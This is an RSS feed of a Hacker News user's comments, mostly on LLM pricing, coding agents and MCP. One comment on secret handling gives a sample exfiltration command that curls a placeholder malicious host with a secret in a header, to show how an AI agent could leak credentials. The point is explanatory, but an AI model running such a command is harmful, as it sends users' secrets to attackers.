<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: crazylogger</title><link>https://news.ycombinator.com/user?id=crazylogger</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Thu, 28 May 2026 13:13:33 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=crazylogger" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[What we learned building sandbox for document agents]]></title><description><![CDATA[
<p>Article URL: <a href="https://blog.yfzhou.fyi/posts/doc-sandbox/">https://blog.yfzhou.fyi/posts/doc-sandbox/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=48192600">https://news.ycombinator.com/item?id=48192600</a></p>
<p>Points: 1</p>
<p># Comments: 0</p>
]]></description><pubDate>Tue, 19 May 2026 12:48:04 +0000</pubDate><link>https://blog.yfzhou.fyi/posts/doc-sandbox/</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48192600</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48192600</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5.5 Price Increase: What It Costs"]]></title><description><![CDATA[
<p>OpenRouter may see you fire hundreds of requests at them, but they have no idea that "these 50 requests here at 4PM are for task A", "those 100 requests there does task B", etc. So it's a shallow analysis at the "overall request shape" level.</p>
]]></description><pubDate>Fri, 08 May 2026 15:21:58 +0000</pubDate><link>https://news.ycombinator.com/item?id=48064447</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48064447</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48064447</guid></item><item><title><![CDATA[New comment by crazylogger in "Ask HN: We just had an actual UUID v4 collision..."]]></title><description><![CDATA[
<p>For a single database using UUIDs, yes, it's astronomically rare. But it's quite a different thing to say that no computer system on Earth has ever experienced a UUID collision. The number of systems out there is also astronomical.</p>
]]></description><pubDate>Fri, 08 May 2026 15:04:49 +0000</pubDate><link>https://news.ycombinator.com/item?id=48064242</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48064242</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48064242</guid></item><item><title><![CDATA[New comment by crazylogger in "Microsoft and OpenAI end their exclusive and revenue-sharing deal"]]></title><description><![CDATA[
<p>People had this "why you probably can't run a GPT-4 (or even GPT-3.5) class model on your MBP anytime soon" conversation before.<p>Today's LLMs are able pack much more capabilities into fewer parameters compared to 2023. We might still be at the very rudimentary phase of this technology there are low-hanging efficiency gains to be had left and right. These models consume many orders of magnitude more energy than a human brain, this all seems like room for improvement.<p>The right question: is there a law in information theory that fundamentally prevents a 70B model of any architecture from being as smart as Opus 4.7?</p>
]]></description><pubDate>Tue, 28 Apr 2026 02:21:16 +0000</pubDate><link>https://news.ycombinator.com/item?id=47929823</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47929823</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47929823</guid></item><item><title><![CDATA[New comment by crazylogger in "Amateur armed with ChatGPT solves an Erdős problem"]]></title><description><![CDATA[
<p>"Hi ChatGPT, propose and prove something radically new in the genre of Gödel's theorem."<p>How is this not just another proposed problem (albeit with a search space much larger than an Erdos problem's)?</p>
]]></description><pubDate>Sun, 26 Apr 2026 06:18:25 +0000</pubDate><link>https://news.ycombinator.com/item?id=47907850</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47907850</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47907850</guid></item><item><title><![CDATA[New comment by crazylogger in "DeepSeek v4"]]></title><description><![CDATA[
<p>I haven't seen anyone claiming that API prices are subsidized.<p>At some point (from the very beginning till ~2025Q4) Claude Code's usage limit was so generous that you can get roughly $10~20 (API-price-equivalent) worth of usage out of a $20/mo Pro plan <i>each day</i> (2 * 5h window) - and for good reason, because LLM agentic coding is extremely token-heavy, people simply wouldn't return to Claude Code for the second time if provided usage wasn't generous or every prompt costs you $1. And then Codex started trying to poach Claude Code users by offering even greater limits and constantly resetting everyone's limit in recent months. The API price would have to be 30x operating cost to make this not a subsidy. <i>That</i> would be an extraordinary claim.</p>
]]></description><pubDate>Fri, 24 Apr 2026 07:29:34 +0000</pubDate><link>https://news.ycombinator.com/item?id=47886827</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47886827</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47886827</guid></item><item><title><![CDATA[New comment by crazylogger in "DeepSeek v4"]]></title><description><![CDATA[
<p>Training data == source code, training algorithm == compiler, model weights == compiled binary.</p>
]]></description><pubDate>Fri, 24 Apr 2026 06:15:24 +0000</pubDate><link>https://news.ycombinator.com/item?id=47886266</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47886266</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47886266</guid></item><item><title><![CDATA[New comment by crazylogger in "Sam Altman may control our future – can he be trusted?"]]></title><description><![CDATA[
<p>If all they do is "just" brute-force problem solving, then they are already bound to take over R&D & other knowledge work and exponentially accelerate progress, i.e. the SciFi "singularity" BS ends up happening all the same. Whether we classify them as true reasoning is just semantics.</p>
]]></description><pubDate>Tue, 07 Apr 2026 01:42:04 +0000</pubDate><link>https://news.ycombinator.com/item?id=47669740</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47669740</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47669740</guid></item><item><title><![CDATA[New comment by crazylogger in "Claude Code's source code has been leaked via a map file in their NPM registry"]]></title><description><![CDATA[
<p>Why would this be in the client code though?</p>
]]></description><pubDate>Tue, 31 Mar 2026 14:18:39 +0000</pubDate><link>https://news.ycombinator.com/item?id=47587770</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47587770</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47587770</guid></item><item><title><![CDATA[New comment by crazylogger in "Improving Composer through real-time RL"]]></title><description><![CDATA[
<p>This feels so wrong. the LLM should play the role of a very general (but empty & un-opinionated) brain - you don’t want to perform a coding-specific lobotomy on someone every day. The proper target of their RL should have been their harness. That’s what determines the agent's trajectory as much as the base model.<p>I also wonder since they’re doing constant RL on model weights with <i>today's Cursor design</i>, does that mean they can never change their system prompt & other parts of the harness?<p>1) Comparison between past trajectories data would be meaningless if they were operating under different instructions.<p>2) Performance will be terrible the next time they change their tool design, since the model is now "opinionated" based on how a previous version of Cursor was designed.<p>Anthropic is more sensible with their “constitution” approach to safety. The behaviors (and ultimately the values) you want your model to follow should be a document, not a lobotomy.</p>
]]></description><pubDate>Sat, 28 Mar 2026 02:30:21 +0000</pubDate><link>https://news.ycombinator.com/item?id=47550961</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47550961</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47550961</guid></item><item><title><![CDATA[New comment by crazylogger in "When does MCP make sense vs CLI?"]]></title><description><![CDATA[
<p>MCP solves a very specific problem: how do you ship a LLM’s tool/function so that it is callable by an LLM in an inter-process manner (so that you don’t need to modify OpenAI’s code to make your tool available in ChatGPT)? CLIs concern what happens inside such tools, namely a `bash` tool. As you can see they are different layers of the same stack.<p>> LLMs don’t need a special protocol ... LLMs are really good at using command-line tools.<p>The author's point only makes sense if LLMs all have a computer built-in - they don't. LLMs will only have a commandline if it is provided with commandline tools, and MCP is the standard way to provide tools.<p>If I have to find an analogy for this (nonsensical) MCP vs. CLI framing, it's like someone saying “ditch the browser, use html instead” - what is that supposed to mean?</p>
]]></description><pubDate>Mon, 02 Mar 2026 05:54:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=47214332</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47214332</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47214332</guid></item><item><title><![CDATA[New comment by crazylogger in "Making MCP cheaper via CLI"]]></title><description><![CDATA[
<p>Setting an env var on a machine the LLM has control over <i>is</i> giving it the secret. When LLM tries `echo $SECRET` or `curl <a href="https://malicious.com/api" rel="nofollow">https://malicious.com/api</a> -h secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?<p>Prior art: <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/" rel="nofollow">https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/</a></p>
]]></description><pubDate>Thu, 26 Feb 2026 10:38:24 +0000</pubDate><link>https://news.ycombinator.com/item?id=47164255</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47164255</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47164255</guid></item><item><title><![CDATA[New comment by crazylogger in "Making MCP cheaper via CLI"]]></title><description><![CDATA[
<p>Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.<p>MCP is a thin toolcall auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.</p>
]]></description><pubDate>Thu, 26 Feb 2026 04:09:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=47161728</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47161728</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47161728</guid></item><item><title><![CDATA[New comment by crazylogger in "A16z partner says that the theory that we’ll vibe code everything is wrong"]]></title><description><![CDATA[
<p>Money is useful mostly for hiring human labor to outcompete others, e.g. Satya Nadella has 100K employees under his command, you don't, so you can't realistically compete with MS today - this is their main moat.<p>If AI renders human labor a cheap commodity (say you can orchestrate a bunch of agents to develop + market a Windows competitor for $1000 of compute), what used to be "Satya + his army vs. you" now becomes mostly a 1:1 fair fight, which favors the startup.</p>
]]></description><pubDate>Sun, 22 Feb 2026 01:46:26 +0000</pubDate><link>https://news.ycombinator.com/item?id=47107239</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47107239</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47107239</guid></item><item><title><![CDATA[New comment by crazylogger in "Code is cheap. Show me the talk"]]></title><description><![CDATA[
<p>You are describing tradition (deterministic?) automation before AI. With AI systems as general as today's SOTA LLMs, they'll happily take on the job regardless of the task falling into class I or class II.<p>Ask a robot arm "how should we improve our car design this year", it'll certainly get stuck. Ask an AI, it'll give you a real opinion that's at least on par with a human's opinion. If a company builds enough tooling to complete the "AI comes up with idea -> AI designs prototype -> AI robot physically builds the car -> AI robot test drives the car -> AI evaluates all prototypes and confirms next year's design" feedback loop, then theoretically this definitely can work.<p>This is why AI is seen as such a big deal - it's fundamentally different from all previous technologies. To an AI, there is no line that would distinguish class I from II.</p>
]]></description><pubDate>Fri, 30 Jan 2026 16:19:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=46826247</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46826247</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46826247</guid></item><item><title><![CDATA[New comment by crazylogger in "TimeCapsuleLLM: LLM trained only on data from 1800-1875"]]></title><description><![CDATA[
<p>Or maybe, LLMs <i>are</i> pioneering scientific advancements - people are using LLMs to read papers, choose what problems to work on, come up with experiments, analyze results, and draft papers, etc., at this very moment. Except they eventually stick their human names on the cover so we almost never know.</p>
]]></description><pubDate>Tue, 13 Jan 2026 05:25:07 +0000</pubDate><link>https://news.ycombinator.com/item?id=46597553</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46597553</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46597553</guid></item><item><title><![CDATA[New comment by crazylogger in "Claude Code CLI was broken"]]></title><description><![CDATA[
<p>Proper vibe coding should involves tons of vibe refactoring.<p>I'd say spending at least a quarter of my vibe coding time on refactoring + documentation refresh to ensure the codebase looking impeccable is the only way my projects can work at all long term. We don't want to confuse the coding agent.</p>
]]></description><pubDate>Fri, 09 Jan 2026 03:11:00 +0000</pubDate><link>https://news.ycombinator.com/item?id=46549660</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46549660</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46549660</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5.2-Codex"]]></title><description><![CDATA[
<p>From a couple hours of usage in the CLI, 5.2-codex seems to burn through my plan's limit noticeably faster than 5.1-codex. So I guess the usage limit is a set dollar amount of API credits under the hood.</p>
]]></description><pubDate>Fri, 19 Dec 2025 07:18:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=46323089</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46323089</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46323089</guid></item><item><title><![CDATA[New comment by crazylogger in "Structured outputs on the Claude Developer Platform"]]></title><description><![CDATA[
<p>The way you get structured output with Claude prior to this is via tool use.<p>IMO this was the more elegant design if you think about it: <i>tool calling is really just structured output and structured output is tool calling</i>. The "do not provide multiple ways of doing the same thing" philosophy.</p>
]]></description><pubDate>Sat, 15 Nov 2025 12:05:15 +0000</pubDate><link>https://news.ycombinator.com/item?id=45936865</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=45936865</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45936865</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5-Codex-Mini – A more compact and cost-efficient version of GPT-5-Codex"]]></title><description><![CDATA[
<p>This is just personal experience + reddit anecdotes. I've been using CC from day one (when API pricing was the only way to pay for CC), then I've been on the $20 Pro plan and am getting a solid $5+ worth of usage in each 5h session, times 5-10 sessions per week (so an overall 5-10x subsidy over one month.) And I extrapolated that $200 subscribers must be getting roughly 10x Pro's usage. I do feel the actual limit fluctuates each week as Claude Code engage in this new subsidy war with OAI Codex though.<p>My theory is this:<p>- we know from benchmarks that open-weight models like Deepseek R1 and Kimi K2's capabilities are not far behind SOTA GPT/Claude<p>- open-weight API pricing (e.g. on openrouter) is roughly 1/10~1/5 that of GPT/Claude<p>- users can more or less choose to hook their agent CLI/IDEs to either closed or open models<p>If these points are true, then the only reason people are primarily on CC & Codex plans is because they are subsidized by at least 5~10x. When confronted with true costs, users will quickly switch to the lowest inference cost vendor, and we get perfect competition + zero margin for all vendors.</p>
]]></description><pubDate>Sun, 09 Nov 2025 06:51:54 +0000</pubDate><link>https://news.ycombinator.com/item?id=45863491</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=45863491</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45863491</guid></item></channel></rss>